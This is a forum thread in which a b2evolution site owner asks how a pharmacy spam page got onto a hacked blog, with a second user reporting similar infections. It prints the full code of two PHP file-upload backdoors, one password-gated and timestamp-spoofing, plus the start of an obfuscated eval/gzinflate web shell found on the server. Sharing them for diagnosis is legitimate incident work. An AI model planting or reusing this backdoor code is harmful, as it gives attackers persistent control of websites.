I became aware of the fact that if one goes to mysite.com/doc - a pharmacy site page opens. Mysite.com is powered by b2evolution 4.1.7 (was 4.0.5 prior to the hack).
The /doc directory contains some CSS and HTML files. The question is, how did they get there?
Here are some relevant details:
- I'm using shared hosting on Bluehost
- After discovering the `doc` directory, I changed its permissions to 000 and shortly after that, another directory showed up - `doc3`, containing the same pharma store
- Upon discovering that, I thought it is an unpatched problem in 4.0.5, so I upgraded to 4.1.7 - but in a few hours, the pharma site was back
- I compared the directories of my freshly upgraded 4.1.7 with the one that is hacked and there are no differences in the files, nor there are new files, except: images in the /media directory, the `doc` directory itself, and the plugins I installed: akismet, recaptcha, google_analytics
- When I was upgrading to 4.1.7, the install URL had an unusual thing in it: `mysite.com/install/index.php?[b]dasya=true[/b]`. I didn't really pay attention to that, but I remember it wasn't there in earlier versions (and I've been using b2evo since 1.x days). It seems to be some form of malware, because there are a few other hits about it online - but nothing substantial, just people asking about what it is; no solutions or explanations so far.
While examining the previous snapshot of the hacked 4.0.5, I discovered:
- ext.php in the root directory, which was a file uploading interface - the files would go straight to the root directory
- a hidden file called `.thumbs_up.php` in the `/media/blogs/a` directory (where my images go)
- a file called `readmed.php` in the google_analytics_plugin
There are multiple domains hosted on the same Bluehost account, and only of them gets compromised (even though another one is also running b2evolution too (v 3.3.3), in a different subdirectory.
Perhaps there is a server-side problem, not related to b2evo itself; but then... why are other directories not affected? At this point I have quite a lot of different clues, but nothing to glue them together yet. Any help will be greatly appreciated.
body of ext.php (prettified, originally it was a single line thing)
<?php
error_reporting(0);
@ini_set("display_errors", 0);
$var = $_SERVER['PHP_SELF'] . "?";
$form = '<form enctype="multipart/form-data" action="' . $var . '" method="POST"><input name="uploadFile" type="file"/><br/><input type="submit" value="Upload" /></form>';
if (!empty($_FILES['uploadFile']))
{
$self = dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self . DIRECTORY_SEPARATOR . $_FILES["uploadFile"]["name"]);
$time = filemtime($self);
print "OK";
}
else
{
print $form;
} ?>
body of .thumbs_up.php
<?php
$auth_pass = "8a4bf282852bf4c49e17f0951f645e72";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x6
...
<snip>
...
Lq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");
?>
body of readmed.php
<?php error_reporting(0);
@ini_set("display_errors", 0);
$var= $_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING'];
$md5RandomPass = "6c11824f3cbe6d65396edd61c0d27c47";
$form =<<<HTML
<form enctype="multipart/form-data" action="$var" method="POST">
<input name="uploadFile" type="file"/><br/>
<input type="submit" value="Upload" />
</form>
HTML;
if (md5($_REQUEST['pass']) != $md5RandomPass) {
exit();
}
if (!empty($_FILES['uploadFile'])) {
$self = dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);
$time = filemtime($self );
touch($self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"], $time);
print "OK";
} else {
print $form;
} ?>
I wish I could answer how they got there because I had a similar issue within the past week with my host, Netfirms.
A non-active but still online version of 1.9.3 was suddenly found to have been compromised with a couple of rogue PHP scripts:
Another active site running B2 5.06 was also somehow infected with .Thumbs_up.
I deleted the files and a couple of unused FTP accounts and have not had trouble since (knock wood). Makes me wonder if someone left a backdoor open somewhere.